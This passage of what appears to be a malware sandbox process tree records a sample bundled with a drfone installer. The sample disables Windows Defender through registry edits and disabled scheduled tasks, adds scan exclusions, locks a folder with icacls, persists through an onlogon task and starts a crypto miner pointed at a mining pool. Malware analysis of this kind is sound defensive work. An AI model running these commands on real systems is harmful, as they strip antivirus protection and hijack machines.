        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          PID: 2032
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          PID: 3892
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          PID: 192
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          PID: 1780
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          PID: 2216
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          PID: 3896
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          PID: 2744
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          PID: 3760
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          PID: 1704
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          PID: 3688
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 3608
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 1052
        Level 5: C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          PID: 4040
        Level 5: C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          PID: 1520
        Level 5: C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          PID: 856
        Level 5: C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          PID: 2316
        Level 5: C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          PID: 1008
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          PID: 1236
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          PID: 2296
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          PID: 3880
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          PID: 2196
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          PID: 2220
        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          PID: 2600
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:3756
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2032
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:3892
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [depth 5, PID 1780]
    powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [depth 5, PID 3672]
    powershell.exe -command "Add-MpPreference -ExclusionExtension ".vbs""
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 3924]
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\main.bat" "

C:\Windows\SysWOW64\mode.com  [depth 5, PID 1004]
    mode 65,10

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 1008]
    7z.exe e file.zip -p___________14565pwd7455pwd31616___________ -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 3780]
    7z.exe e extracted/file_8.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 1816]
    7z.exe e extracted/file_7.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 2564]
    7z.exe e extracted/file_6.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 2512]
    7z.exe e extracted/file_5.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 3892]
    7z.exe e extracted/file_4.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 3896]
    7z.exe e extracted/file_3.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 3672]
    7z.exe e extracted/file_2.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe  [depth 5, PID 4040]
    7z.exe e extracted/file_1.zip -oextracted
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\ocIiQTVv14pHbbM\iexplore.exe  [depth 5, PID 3808]
    "iexplore.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  [depth 6, PID 2220]
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe  [depth 7, PID 1144]
    "C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe"
    - Executes dropped EXE
    - Modifies system certificate store

C:\Windows\SysWOW64\cmd.exe  [depth 8, PID 3712]
    C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"

C:\Windows\SysWOW64\icacls.exe  [depth 9, PID 932]
    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
    - Modifies file permissions

C:\Windows\SysWOW64\icacls.exe  [depth 9, PID 3808]
    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
    - Modifies file permissions

C:\Windows\SysWOW64\icacls.exe  [depth 9, PID 3476]
    icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
    - Modifies file permissions

C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe  [depth 7, PID 2216]
    "C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\cmd.exe  [depth 8, PID 512]
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit

C:\Windows\system32\schtasks.exe  [depth 9, PID 2232]
    schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'
    - Creates scheduled task(s)

C:\Users\Admin\AppData\Local\Temp\MUIServices.exe  [depth 8, PID 3660]
    "C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\cmd.exe  [depth 9, PID 1932]
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit

C:\Windows\system32\schtasks.exe  [depth 10, PID 1328]
    schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'
    - Creates scheduled task(s)

C:\Windows\explorer.exe  [depth 9, PID 2080]
    C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0xadc1936d485897e6109feafea9fa5a7cf562381d`[email protected]:9999
C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1052]
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\1x66wvmhfpDEL.bat" "

C:\Windows\SysWOW64\timeout.exe  [depth 5, PID 2084]
    timeout /T 120 /NOBREAK
    - Delays execution with timeout.exe

C:\Program Files (x86)\drfone-for-android_full1544.exe  [depth 3, PID 1452]
    "C:\Program Files (x86)\drfone-for-android_full1544.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp  [depth 4, PID 1908]
    "C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp" /SL5="$20210,102997482,134144,C:\Program Files (x86)\drfone-for-android_full1544.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow

C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe  [depth 5, PID 1956]
    "C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe  [depth 5, PID 2256]
    "C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART
    - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp  [depth 6, PID 3724]
    "C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp" /SL5="$C0032,9653206,121344,C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART
    - Executes dropped EXE
    - Drops file in Windows directory

C:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exe  [depth 7, PID 4092]
    C:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exe
    - Executes dropped EXE
    - Modifies system certificate store
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 720]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Xml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1172]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 2720]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 258 -Pipe 27c -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 932]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "Accessibility, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1552]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 16c -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1008]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 258 -Pipe 260 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 972]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 416]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1296]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1d0 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 668]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 2512]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1552]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 260 -Pipe 264 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 2732]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1500]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3708]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1d8 -Comment "NGen Worker Process"
    - Loads dropped DLL

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 2208]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Security, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1272]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1e0 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3476]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 1ec -Pipe 254 -Comment "NGen Worker Process"
    - Loads dropped DLL

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 2388]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Data.SqlXml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3656]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 150 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3776]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 2a4 -Pipe 280 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1780]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 0 -NGENProcess 28c -Pipe 288 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 1764]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Management, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 856]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 932]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 26c -Pipe 25c -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 496]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "CustomMarshalers, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3348]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 4092]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 278 -Pipe 264 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 3764]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.ServiceProcess, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 2700]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 2196]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 0 -NGENProcess 26c -Pipe 258 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 1828]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Configuration.Install, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1272]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3708]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 284 -Pipe 274 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 2616]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Runtime.Serialization, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 3656]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Runtime.Serialization.Formatters.Soap, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 496]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 16c -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 4052]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 0 -NGENProcess 26c -Pipe 260 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 804]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3488]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1c8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3112]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1d8 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 972]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Deployment, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3636]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1d4 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1828]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 25c -Pipe 1e0 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 2616]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.EnterpriseServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3620]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3772]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 258 -Pipe 270 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 3908]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Messaging, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 1328]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1dc -Pipe 1d0 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 2316]
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 26c -Pipe 254 -Comment "NGen Worker Process"
    - Loads dropped DLL
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe  [depth 7, PID 3472]
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Runtime.Remoting, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
    - Drops file in Windows directory

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe  [depth 8, PID 3484]
